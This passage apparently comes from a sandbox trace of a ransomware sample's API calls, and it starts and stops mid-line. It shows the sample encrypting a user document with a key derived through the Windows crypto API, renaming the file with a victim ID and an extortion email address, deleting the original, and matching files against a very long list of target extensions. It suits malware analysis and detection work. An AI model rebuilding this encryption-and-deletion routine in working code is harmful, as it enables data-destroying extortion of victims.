returned=".rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0188.854] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0188.854] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0188.854] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\9wryc98w.rtf" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\9wryc98w.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0188.859] ReadFile (in: hFile=0x388, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x15d10, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18a640*=0x15d10, lpOverlapped=0x0) returned 1
	[0188.867] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.867] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcb5d8) returned 1
	[0188.869] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.870] CryptCreateHash (in: hProv=0xfcb5d8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0188.870] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.870] CryptHashData (hHash=0xfb90b0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0188.870] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.870] CryptDeriveKey (in: hProv=0xfcb5d8, Algid=0x6610, hBaseData=0xfb90b0, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb90f0) returned 1
	[0188.870] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.870] CryptEncrypt (in: hKey=0xfb90f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0x15d10, dwBufLen=0x15d10 | out: pbData=0x0*, pdwDataLen=0x18a20c*=0x15d20) returned 1
	[0188.873] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0188.873] RtlMoveMemory (in: Destination=0xff2e98, Source=0xfdd180, Length=0x15d10 | out: Destination=0xff2e98) 
	[0188.873] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.873] CryptEncrypt (in: hKey=0xfb90f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xff2e98*, pdwDataLen=0x18a1ec*=0x15d10, dwBufLen=0x15d20 | out: pbData=0xff2e98*, pdwDataLen=0x18a1ec*=0x15d20) returned 1
	[0188.875] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.876] CryptDestroyKey (hKey=0xfb90f0) returned 1
	[0188.876] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.876] CryptDestroyHash (hHash=0xfb90b0) returned 1
	[0188.876] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.876] CryptReleaseContext (hProv=0xfcb5d8, dwFlags=0x0) returned 1
	[0188.876] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0188.877] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0188.877] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.887] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0188.888] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\9wryc98w.rtf.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 126
	[0188.888] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\9wryc98w.rtf.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\9wryc98w.rtf.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0188.889] WriteFile (in: hFile=0x390, lpBuffer=0xff2e98*, nNumberOfBytesToWrite=0x15d20, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xff2e98*, lpNumberOfBytesWritten=0x18a648*=0x15d20, lpOverlapped=0x0) returned 1
	[0188.900] CloseHandle (hObject=0x390) returned 1
	[0188.901] CloseHandle (hObject=0x388) returned 1
	[0188.901] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\9wryc98w.rtf" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\9wryc98w.rtf")) returned 1
	[0188.917] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\9wryc98w.rtf" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\9wryc98w.rtf")) returned 0
	[0188.918] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3cbaab50, ftCreationTime.dwHighDateTime=0x1d97481, ftLastAccessTime.dwLowDateTime=0x7e47f2b0, ftLastAccessTime.dwHighDateTime=0x1d97578, ftLastWriteTime.dwLowDateTime=0x7e47f2b0, ftLastWriteTime.dwHighDateTime=0x1d97578, nFileSizeHigh=0x0, nFileSizeLow=0x9a76, dwReserved0=0x0, dwReserved1=0x0, cFileName="aO66kKoo-.ods", cAlternateFileName="AO66KK~1.ODS")) returned 1
	[0188.918] lstrcmpW (lpString1="aO66kKoo-.ods", lpString2="..") returned 1
	[0188.918] lstrcmpW (lpString1="aO66kKoo-.ods", lpString2=".") returned 1
	[0188.918] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\"
	[0188.918] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\", lpString2="aO66kKoo-.ods" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\aO66kKoo-.ods") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\aO66kKoo-.ods"
	[0188.918] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\aO66kKoo-.ods") returned 85
	[0188.918] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0188.919] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\aO66kKoo-.ods", cchLength=0x55 | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\ao66kkoo-.ods") returned 0x55
	[0188.919] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.919] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\ao66kkoo-.ods", lpSrch="help_decrypt_your_files") returned 0x0
	[0188.919] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\ao66kkoo-.ods" | out: lpString1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\ao66kkoo-.ods") returned="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\ao66kkoo-.ods"
	[0188.919] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\ao66kkoo-.ods") returned 85
	[0188.919] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0188.920] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.920] StrStrW (lpFirst=".ods", lpSrch=".") returned=".ods"
	[0188.920] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.920] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ods") returned=".ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.pp